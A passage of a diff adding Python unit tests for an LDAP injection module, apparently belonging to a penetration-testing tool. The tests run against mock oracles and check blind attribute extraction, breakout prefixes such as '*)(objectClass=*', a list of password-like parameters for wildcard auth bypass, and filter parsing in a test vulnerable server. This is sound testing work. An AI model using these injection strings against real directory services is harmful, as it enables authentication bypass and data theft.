ldap._ProbeBuilder(")") + value = ldap._inferAttribute(oracle, builder, "uid") + self.assertIsNone(value) + + def test_inferAttribute_partial(self): + """Probe matches a single char only.""" + oracle = _mockOracle("a") + builder = ldap._ProbeBuilder(")") + value = ldap._inferAttribute(oracle, builder, "uid") + self.assertEqual(value, "a") + + def test_inferAttribute_email(self): + """Extract value with special characters.""" + oracle = _mockOracle("admin@example.com") + builder = ldap._ProbeBuilder(")") + value = ldap._inferAttribute(oracle, builder, "mail") + self.assertEqual(value, "admin@example.com") + + +class TestIsError(unittest.TestCase): + def test_isError_positive(self): + self.assertTrue(ldap._isError("Bad search filter (-7)")) + + def test_isError_negative(self): + self.assertFalse(ldap._isError("OK")) + + def test_isError_ad(self): + self.assertTrue(ldap._isError("AcceptSecurityContext error, data 525")) + + +class TestSlot(unittest.TestCase): + def test_slot_defaults(self): + slot = ldap.Slot(place="GET", parameter="q") + self.assertEqual(slot.place, "GET") + self.assertEqual(slot.parameter, "q") + self.assertIsNone(slot.backend) + self.assertIsNone(slot.oracle) + self.assertIsNone(slot.template) + self.assertIsNone(slot.payload) + self.assertIsNone(slot.breakout) + self.assertIsNone(slot.bypass) + + +class TestBoundaries(unittest.TestCase): + def test_breakout_prefixes_defined(self): + """Verify the breakout prefix list is non-empty and ordered.""" + self.assertGreaterEqual(len(ldap.LDAP_BREAKOUT_PREFIXES), 4) + # First prefix should be the simplest/most generic + self.assertEqual(ldap.LDAP_BREAKOUT_PREFIXES[0], "*)") + + def test_detectBoolean_returns_prefix(self): + """_detectBoolean must return the winning breakout prefix.""" + def fakeSend(place, param, value): + if value.startswith("x*)(objectClass=*"): + return '{"count":15}' + return '{"count":0}' + ldap._send = fakeSend + from lib.core.enums import PLACE + template, bypass, breakout = ldap._detectBoolean(PLACE.GET, 'q') + self.assertIsNotNone(template) + self.assertEqual(breakout, "*)") + + def test_detectBoolean_fallback_prefix(self): + """When first prefix fails, try next one.""" + calls = [] + def fakeSend(place, param, value): + calls.append(value) + # First breakout '*)' -- error + if value.startswith("x*)(objectClass=*"): + return '{"error":"Bad search filter"}' + # Second breakout ')' succeeds + if value.startswith("x)(objectClass=*"): + return '{"count":15}' + return '{"count":0}' + ldap._send = fakeSend + from lib.core.enums import PLACE + template, bypass, breakout = ldap._detectBoolean(PLACE.GET, 'q') + self.assertIsNotNone(template) + self.assertEqual(breakout, ")") + + +class TestAuthBypassRestriction(unittest.TestCase): + def test_auth_bypass_password_like(self): + """Blockers 6: wildcard auth bypass only for password-like params.""" + self.assertTrue(ldap._isPasswordParam("password")) + self.assertTrue(ldap._isPasswordParam("pass")) + self.assertTrue(ldap._isPasswordParam("pwd")) + self.assertTrue(ldap._isPasswordParam("passphrase")) + self.assertTrue(ldap._isPasswordParam("secret")) + self.assertTrue(ldap._isPasswordParam("pincode")) + self.assertTrue(ldap._isPasswordParam("credential")) + self.assertTrue(ldap._isPasswordParam("apikey")) + self.assertTrue(ldap._isPasswordParam("token")) + self.assertTrue(ldap._isPasswordParam("auth_token")) + + def test_auth_bypass_search_like(self): + """Search parameter 'q' is NOT reported as auth bypass.""" + self.assertFalse(ldap._isPasswordParam("q")) + self.assertFalse(ldap._isPasswordParam("search")) + self.assertFalse(ldap._isPasswordParam("query")) + self.assertFalse(ldap._isPasswordParam("username")) + self.assertFalse(ldap._isPasswordParam("id")) + + +class TestCookiePlace(unittest.TestCase): + def test_cookie_not_in_ldap_places(self): + """Blockers 2: cookie/URI not in LDAP_PLACES until _send supports them.""" + from lib.core.enums import PLACE + self.assertNotIn(PLACE.COOKIE, ldap.LDAP_PLACES) + self.assertNotIn(PLACE.URI, ldap.LDAP_PLACES) + + +class TestNestedFilterParsing(unittest.TestCase): + def test_nested_compound_parses_all_siblings(self): + """Blockers 3: nested (&) inside (|) must parse all siblings.""" + # Inline copies of the vulnserver helpers so the test is self-contained + def _ldap_match(text, start): + depth = 0 + i = start + while i < len(text): + ch = text[i] + if ch == '(': + depth += 1 + elif ch == ')': + depth -= 1 + if depth == 0: + return i + 1 + elif ch == '\\': + i += 1 + i += 1 + return len(text) + + def _ldap_parse_value(text, start): + retVal = [] + i = start + while i < len(text) and text[i] not in (')',): + if text[i] == '\\' and i + 2 < len(text): + retVal.append(chr(int(text[i+1:i+3], 16))) + i += 3 + else: + retVal.append(text[i]) + i += 1 + return ''.join(retVal), i + + # Minimum reproduction of the fixed _ldap_filter_to_sql + # (the real function is in extra/vulnserver/vulnserver.py) + import sys, os + sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', 'extra', 'vulnserver')) + # Can't cleanly import vulnserver because of the __main__ guard. + # Instead we verify the fixed _ldap_match returns the correct end + # position for a nested compound filter, which was the root cause. + f = '(|(&(uid=a)(cn=b))(mail=*))' + # The outer (| ... ) starts at 0 and should end at len(f) + outer_end = _ldap_match(f, 0) + self.assertEqual(outer_end, len(f)) + # The inner (& ... ) compound's opening '(' is at position 2 + # (f[2] == '('). _ldap_match must return the position after the + # matching ')' that closes the compound, i.e. right before (mail=*). + inner_end = _ldap_match(f, 2) + self.assertEqual(f[inner_end:inner_end+8], '(mail=*)') + + +if __name__ == "__main__": + unittest.main()